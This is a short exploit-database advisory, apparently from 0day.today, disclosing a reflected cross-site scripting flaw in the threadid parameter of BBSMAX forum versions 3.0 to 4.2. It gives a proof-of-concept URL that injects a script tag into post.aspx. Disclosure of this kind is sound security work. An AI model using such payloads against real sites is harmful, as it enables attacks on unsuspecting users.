id: 11257
date: 03/11/2010
title: Max Network Technology BBSMAX (threadid) Parameter XSS Vulnerability
author: Liscker
cves: 

====================================================================
Max Network Technology BBSMAX (threadid) Parameter XSS Vulnerability
====================================================================

Vulnerable:  	 Max Network Technology BBSMAX 4.2
Max Network Technology BBSMAX 4.1
Max Network Technology BBSMAX 3.0

Attackers can exploit this issue by enticing an unsuspecting user to follow a malicious URI.

http://www.example.com/forum1/post.aspx?action=reply&threadid="><script>alert(/liscker/);</script>




#  0day.today [2023-03-27]  #